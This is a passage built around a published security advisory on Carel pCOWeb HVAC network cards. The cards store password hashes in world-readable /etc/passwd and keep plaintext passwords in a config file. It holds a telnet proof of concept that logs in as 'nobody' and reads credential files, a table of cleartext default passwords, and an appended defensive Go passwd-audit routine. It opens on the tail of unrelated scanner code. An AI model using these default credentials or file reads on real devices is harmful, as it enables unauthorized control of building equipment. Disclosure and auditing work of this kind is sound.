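	alerts, err := scan(sampleCapture, map[string]bool{"192.168.0.10": true})
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("ALERT from %s: %s (%s)\n", a.Src, a.Function, a.Detail)
	}
}
```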

[FD] [RT-SA-2019-013] Unsafe Storage of Credentials in Carel pCOWeb HVAC

2019-10-31 Thread RedTeam Pentesting GmbH
Advisory: Unsafe Storage of Credentials in Carel pCOWeb HVAC

The Carel pCOWeb card stores password hashes in the file "/etc/passwd",
allowing privilege escalation by authenticated users. Additionally,
plaintext copies of the passwords are stored.


Details
===

Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
Affected Versions: "A 1.4.11 - B 1.4.2", possibly others
Fixed Versions: product obsolete
Vulnerability Type: Credential Disclosure / Privilege Escalation
Security Risk: low
Vendor URL: https://www.carel.com/product/pcoweb-card
Vendor Status: notified / product obsolete
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-13
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"The pCOWeb card is used to interface the pCO Sistema to networks that
use the HVAC protocols based on the Ethernet physical standard, such as
BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated
Web-Server, which both contains the HTML pages relating to the specific
application and allows a browser to be used for remote system
management."
(from the vendor's homepage)

It is used as an OEM module in several different HVAC systems and
considered obsolete by the vendor.


More Details
============

The Carel pCOWeb interface provides user accounts with different levels
of privileges. Despite the different privileges, other users, even the
user nobody, are able to read the file "/etc/passwd" which contains the
hashed passwords for all user accounts, especially those with more
privileges. Additionally, a plaintext copy of all passwords is stored in
the file /usr/local/root/flash/etc/sysconfig/userspwd, which is
accessible from the web interface at the URL
http://192.168.0.1/config/pw_changeusers.html
This allows attackers with knowledge of one user account's password to
gain knowledge of the other accounts' passwords, possibly gaining more
privileges.


Proof of Concept
================

Apart from a web interface, the Carel pCOWeb card provides a telnet
interface accessible using a variety of default passwords and, in some
cases, the user "nobody" without password:


$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

Linux 2.4.21-rmk1 (pCOWeb) (ttya0)


pCOWeb login: nobody
No directory /var/lib/nobody!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[nobody@pCOWeb13:58:55 /]$ ls -la /etc/passwd
-rw-r--r--   1 root root  317 Jan  1 00:00 /etc/passwd
[nobody@pCOWeb13:59:00 /]$ cat /etc/passwd
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash
[nobody@pCOWeb13:59:32 /]$ cat /usr/local/root/admin/.htpasswd
admin:7c3fxxrcHcwtc
[nobody@pCOWeb13:59:33 /]$


The following table lists the cleartext passwords for above
password hashes:

 username   |  password
 -----------+-----------
 root       |  froot
 httpadmin  |  fhttpadm
 carel      |  fcarel
 guest      |  fguest
 nobody     |  (none)
 admin      |  fadmin

The passwords for the user accounts "root", "httpadmin", "carel" and
"guest" are documented in section 9.7.2 of the user manual [0], warning
users:

   "it is important to set a password other than the default "froot" to
prevent potentially dangerous outside access."


It is possible that these default credentials are covered in
CVE-2019-13553. Depending on firmware version and/or OEM modifications,
some versions additionally allow Telnet login without password with the
username "nobody" while it is disabled for other versions.

The password for the web interface user "admin" is documented in section
9.2.1 of the user manual [0].

Additionally, some versions were seen with additional user credentials
stored in the directory provided for OEM modifications of the web
interface, such as the username "reserved" with the password "freserve"
in "/usr/local/root/flash/http/reserved/.htpasswd".
Storing some of these passwords in plaintext is covered in
CVE-2019-11369.

However, while the above passwords are stored in hashed form, the web
interface at http://192.168.0.1/config/pw_changeusers.html shows them in
plaintext. A file containing the plaintext passwords can be found in the
filesystem:


[root@pCOWeb14:02:14 /]# cat /usr/local/root/flash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel



Workaround
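
Added example (not RedTeam's code): an audit routine that parses passwd-format content, here the /etc/passwd listing quoted in the advisory, and reports empty password fields, hashes kept outside /etc/shadow and legacy DES crypt(3) hashes. The severity labels are the example's own, not the advisory's ratings.

```go
package main

import (
	"fmt"
	"strings"
)

// Finding is one observation about an account entry.
type Finding struct {
	User, Severity, Issue string
}

// samplePasswd is the /etc/passwd content quoted in the advisory, embedded so the
// audit runs offline; the hashes are exactly the ones printed there.
const samplePasswd = `root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash`

// classifyPasswordField interprets the second passwd field. With shadow passwords
// it should be "x" or a lock marker; anything else puts credential material in a
// world-readable file, which is what let the "nobody" user read every hash here.
func classifyPasswordField(field string) (severity, issue string) {
	switch {
	case field == "":
		return "high", "empty password field: account can log in without a password"
	case field == "x", strings.HasPrefix(field, "*"), strings.HasPrefix(field, "!"):
		return "", "" // shadowed or locked: nothing to report
	case strings.HasPrefix(field, "$"):
		return "medium", "modular-crypt hash kept in world-readable passwd instead of shadow"
	case len(field) == 13:
		return "high", "legacy DES crypt(3) hash (8-character limit, fast to crack) in world-readable passwd"
	default:
		return "medium", "unrecognised password field contents"
	}
}

// auditPasswd parses passwd-format text and reports weak credential storage and
// privilege anomalies per account. Malformed lines are an error, not a skip.
func auditPasswd(content string) ([]Finding, error) {
	var findings []Finding
	for n, line := range strings.Split(content, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		f := strings.Split(line, ":")
		if len(f) != 7 {
			return nil, fmt.Errorf("line %d: expected 7 colon-separated fields, got %d", n+1, len(f))
		}
		user, pw, uid := f[0], f[1], f[2]
		if sev, issue := classifyPasswordField(pw); sev != "" {
			findings = append(findings, Finding{user, sev, issue})
		}
		if uid == "0" && user != "root" {
			findings = append(findings, Finding{user, "high", "additional UID 0 account"})
		}
	}
	return findings, nil
}

// countBySeverity summarises findings for a quick pass/fail view.
func countBySeverity(fs []Finding) map[string]int {
	out := map[string]int{}
	for _, f := range fs {
		out[f.Severity]++
	}
	return out
}

func main() {
	findings, err := auditPasswd(samplePasswd)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("[%-6s] %-10s %s\n", f.Severity, f.User, f.Issue)
	}
	fmt.Println(countBySeverity(findings))
}
```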